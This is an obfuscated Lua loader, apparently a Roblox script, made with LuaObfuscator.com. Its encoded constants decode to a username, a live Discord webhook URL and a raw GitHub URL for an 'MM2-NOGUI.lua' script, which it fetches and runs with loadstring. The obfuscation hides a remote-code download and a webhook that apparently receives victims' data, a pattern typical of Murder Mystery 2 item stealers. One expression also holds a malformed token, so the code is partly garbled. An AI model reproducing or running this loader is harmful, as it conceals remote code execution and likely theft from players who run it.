--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v90=v5(v81,v19);v19=nil;return v90;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(928 -((1279 -(68 + 997)) + 713)))))%((5 -3)^(((v33-(1 + 0)) -(v32-(878 -(282 + 595)))) + (1 -0))) ;return v82-(v82%(2 -1)) ;else local v83=((1891 -(a226 + 1044)) -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v83 + v83))>=v83) and (1 -0)) or (568 -(367 + 201)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + 2 + 0 ;return (v36 * 256) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(958 -(892 + 65))) then return (v41 * (40022563 -23245347)) + (v40 * ((297413 -176275) -55602)) + (v39 * ((345 + 124) -213)) + v38 ;end if (v37==(350 -(87 + (1045 -782)))) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + (953 -(802 + 150)) ;v37=1;end end end local function v24() local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,2 -(1 + 0) ,36 -16 ) * ((3 -1)^(24 + (446 -(145 + 293))))) + v42 ;local v46=v20(v43,(1448 -(44 + 386)) -(915 + 82) ,87 -56 );local v47=((v20(v43,32)==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;if (v46==(0 -0)) then if (v45==(0 -(1486 -(998 + 488)))) then return v47 * (0 + 0 + 0) ;else v46=(1 + 0) -0 ;v44=0 + 0 ;end elseif (v46==2047) then return ((v45==(791 -(368 + 423))) and (v47 * ((3 -(774 -(201 + 571)))/(18 -(10 + 8))))) or (v47 * NaN) ;end return v8(v47,v46-(3934 -2911) ) * (v44 + (v45/((444 -(416 + 26))^(165 -(1251 -(116 + 1022)))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v65=3 -2 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 -0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v51==1) then local v87=(function() return 469 -(159 + 310) ;end)();while true do if ((4 -2)~=v87) then else v51=(function() return 2;end)();break;end if (0==v87) then v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v87=(function() return 1;end)();end if (v87==(936 -(39 + 896))) then v58=(function() return {};end)();for v103= #"~",v57 do local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v104~=0) then else local v114=(function() return 0;end)();while true do if (v114~=(1581 -(1535 + 46))) then else v105=(function() return v21();end)();v106=(function() return nil;end)();v114=(function() return 1 -0 ;end)();end if (v114~=1) then else v104=(function() return 2 -1 ;end)();break;end end end if ((561 -(306 + 254))==v104) then if (v105== #",") then v106=(function() return v21()~=(0 + 0) ;end)();elseif (v105==(3 -1)) then v106=(function() return v24();end)();elseif (v105== #"-19") then v106=(function() return v25();end)();end v58[v103]=(function() return v106;end)();break;end end end v87=(function() return 2 + 0 ;end)();end end end if (v51~=2) then else v56[ #"91("]=(function() return v21();end)();for v91= #"!",v23() do local v92=(function() return v21();end)();if (v20(v92, #"[", #"\\")==(0 + 0)) then local v98=(function() return 0;end)();local v99=(function() return;end)();local v100=(function() return;end)();local v101=(function() return;end)();local v102=(function() return;end)();while true do if (v98==(2 -1)) then local v112=(function() return 396 -(115 + 281) ;end)();while true do if (v112~=1) then else v98=(function() return 4 -2 ;end)();break;end if ((572 -(426 + 146))~=v112) then else v101=(function() return nil;end)();v102=(function() return nil;end)();v112=(function() return 1 + 0 ;end)();end end end if (v98==0) then local v113=(function() return 0;end)();while true do if (v113~=1) then else v98=(function() return 1;end)();break;end if ((1456 -(282 + 1174))~=v113) then else v99=(function() return 0 + 0 ;end)();v100=(function() return nil;end)();v113=(function() return 812 -(569 + 242) ;end)();end end end if (2==v98) then while true do if (v99~= #",") then else local v150=(function() return 0 -0 ;end)();local v151=(function() return;end)();while true do if (0~=v150) then else v151=(function() return 0;end)();while true do if (v151==(2 -1)) then v99=(function() return 2;end)();break;end if (v151~=0) then else v102=(function() return {v22(),v22(),nil,nil};end)();if (v100==0) then local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if (v175==(1024 -(706 + 318))) then v176=(function() return 867 -(550 + 317) ;end)();while true do if ((1251 -(721 + 530))==v176) then v102[ #"asd"]=(function() return v22();end)();v102[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v100== #"~") then v102[ #"-19"]=(function() return v23();end)();elseif (v100==2) then v102[ #"asd"]=(function() return v23() -((2 -0)^(39 -23)) ;end)();elseif (v100== #"gha") then local v184=(function() return 0 -0 ;end)();local v185=(function() return;end)();while true do if (v184==(0 -0)) then v185=(function() return 285 -(134 + 151) ;end)();while true do if (v185==(700 -(271 + 429))) then v102[ #"asd"]=(function() return v23() -((1667 -(970 + 695))^16) ;end)();v102[ #".dev"]=(function() return v22();end)();break;end end break;end end end v151=(function() return 1;end)();end end break;end end end if (v99==2) then local v152=(function() return 0 -0 ;end)();local v153=(function() return;end)();while true do if (0~=v152) then else v153=(function() return 1990 -(582 + 1408) ;end)();while true do if (v153==0) then if (v20(v101, #">", #"|")== #"~") then v102[2]=(function() return v58[v102[1502 -(1408 + 92) ]];end)();end if (v20(v101,6 -4 ,1290 -(993 + 295) )~= #"[") then else v102[ #"xxx"]=(function() return v58[v102[ #"91("]];end)();end v153=(function() return 1;end)();end if ((1 -0)~=v153) then else v99=(function() return  #"19(";end)();break;end end break;end end end if (v99~=(0 -0)) then else local v154=(function() return 0 + 0 ;end)();local v155=(function() return;end)();while true do if (v154==(1824 -(1195 + 629))) then v155=(function() return 0 -0 ;end)();while true do if ((1 + 0)==v155) then v99=(function() return  #"}";end)();break;end if (v155~=(241 -(187 + 54))) then else v100=(function() return v20(v92,2, #"xxx");end)();v101=(function() return v20(v92, #"xnxx",6);end)();v155=(function() return 1;end)();end end break;end end end if (v99~= #"19(") then else if (v20(v101, #"19(", #"-19")== #",") then v102[ #"xnxx"]=(function() return v58[v102[ #"0836"]];end)();end v53[v91]=(function() return v102;end)();break;end end break;end end end end for v93= #"]",v23() do v54,v93,v28=(function() return v52(v54,v93,v28);end)();end return v56;end if ((529 -(406 + 123))==v51) then local v89=(function() return 0;end)();while true do if (v89==0) then v52=(function() return function(v107,v108,v109) local v110=(function() return 0;end)();local v111=(function() return;end)();while true do if (v110~=(780 -(162 + 618))) then else v111=(function() return 0 + 0 ;end)();while true do if (v111==(0 + 0)) then local v165=(function() return 0 -0 ;end)();local v166=(function() return;end)();while true do if (v165==(0 -0)) then v166=(function() return 0 + 0 ;end)();while true do if (v166==(1145 -(466 + 679))) then v107[v108-#"{" ]=(function() return v109();end)();return v107,v108,v109;end end break;end end end end break;end end end;end)();v53=(function() return {};end)();v89=(function() return 1637 -(1373 + 263) ;end)();end if (v89==(1002 -(451 + 549))) then v51=(function() return 2 -1 ;end)();break;end if (v89==(1 + 0)) then v54=(function() return {};end)();v55=(function() return {};end)();v89=(function() return 2 -0 ;end)();end end end end end local function v29(v59,v60,v61) local v62=v59[1901 -(106 + 1794) ];local v63=v59[733 -(476 + 255) ];local v64=v59[1 + 2 ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1 + 0 ;local v72= -(2 -1);local v73={};local v74={...};local v75=v12("#",...) -(115 -(4 + 110)) ;local v76={};local v77={};for v84=584 -(57 + 527) ,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1428 -(41 + 1386) ];if ((4962>1721) and (v80<=7)) then if (v80<=(106 -(17 + 86))) then if (v80<=(1 + 0)) then if (v80>(0 -0)) then local v116=0 -(1130 -(369 + 761)) ;local v117;local v118;local v119;local v120;while true do if ((167 -(122 + 44))==v116) then v72=(v119 + v117) -(1 -0) ;v120=0 -(0 + 0) ;v116=2 + 0 ;end if (v116==(1 + 1)) then for v167=v117,v72 do local v168=0;while true do if ((802<=4833) and (v168==(0 -0))) then v120=v120 + (66 -(30 + 35)) ;v77[v167]=v118[v120];break;end end end break;end if (v116==(0 + 0)) then v117=v79[1259 -(1043 + 214) ];v118,v119=v70(v77[v117](v13(v77,v117 + (3 -(2 -0)) ,v79[1215 -(323 + (1684 -795)) ])));v116=2 -1 ;end end else local v121=580 -(361 + 219) ;local v122;local v123;while true do if (v121==(321 -(53 + 267))) then v77[v122 + (239 -(64 + 174)) ]=v123;v77[v122]=v123[v79[1 + 3 ]];break;end if ((2087==2087) and ((413 -(15 + 398))==v121)) then v122=v79[984 -(18 + 138 + 826) ];v123=v77[v79[11 -8 ]];v121=1 + 0 ;end end end elseif (v80>2) then v77[v79[2]]=v79[2 + 1 ];else v61[v79[853 -((29 -9) + 830) ]]=v77[v79[(338 -(144 + 192)) + 0 ]];end elseif ((v80<=5) or (4445<4149)) then if ((v80==(130 -(116 + 10))) or (1818==85)) then v77[v79[1 + 1 ]]=v61[v79[741 -(542 + 196) ]];else local v130=v79[2];local v131=v77[v79[3]];v77[v130 + ((217 -(42 + 174)) -0) ]=v131;v77[v130]=v131[v79[2 + 2 ]];end elseif (v80==(4 + 2)) then v61[v79[2 + 1 ]]=v77[v79[4 -2 ]];else local v137=v79[2];v77[v137]=v77[v137](v13(v77,v137 + (2 -1) ,v72));end elseif ((630<2127) and (v80<=((1174 + 388) -(1126 + 425)))) then if (v80<=(414 -(118 + 238 + 49))) then if (v80>((14 + 17) -23)) then do return;end else local v139=v79[1123 -((1622 -(363 + 1141)) + 1003) ];v77[v139]=v77[v139](v13(v77,v139 + (2 -1) ,v72));end elseif ((v80>(387 -(142 + 235))) or (1938==2514)) then v77[v79[9 -7 ]]=v79[3];else local v143=0 + 0 ;local v144;local v145;local v146;local v147;while true do if ((4255>=55) and (v143==(979 -(553 + 424)))) then for v169=v144,v72 do local v170=0 -(1580 -(1183 + 397)) ;while true do if ((2999>1156) and (v170==(0 + 0))) then v147=v147 + 1 + (0 -0) ;v77[v169]=v145[v147];break;end end end break;end if (v143==(1 + 0)) then v72=(v146 + v144) -(1 + 0) ;v147=0 + 0 ;v143=4 -2 ;end if (v143==(0 -(0 + 0))) then v144=v79[4 -2 ];v145,v146=v70(v77[v144](v13(v77,v144 + 1 + 0 ,v79[14 -11 ])));v143=754 -(239 + 514) ;end end end elseif (v80<=13) then if (v80==(5 + 7)) then v77[v79[2 + 0 ]]();else v77[v79[1331 -(797 + 532) ]]();end elseif (v80==(11 + 3)) then do return;end else v77[v79[1 + 1 ]]=v61[v79[6 -3 ]];end v71=v71 + ((3178 -(1913 + 62)) -(373 + 829)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083Q0003083Q00757365724E616D6503073Q006475786B7A696E03073Q00776562482Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31323936313531373Q3038333537323830372F61596E46655449735A57424551576644677049515F6A4B77417864747571723630694C324B5F47764D5041766549395F4B774236797649456E694B41317434452D5F5749030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574036D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F536E6F777956342F566C6F7270536372697074732F323562643033346465322Q33393038306430343065312Q6430366361326334363336613161362Q302F2Q4D322D4E4F4755492E6C7561000C3Q0012033Q00023Q0012023Q00013Q0012033Q00043Q0012023Q00033Q00120F3Q00053Q00120F000100063Q002005000100010007001203000300084Q0001000100034Q00085Q00022Q000D3Q000100012Q00093Q00017Q00",v9(),...);
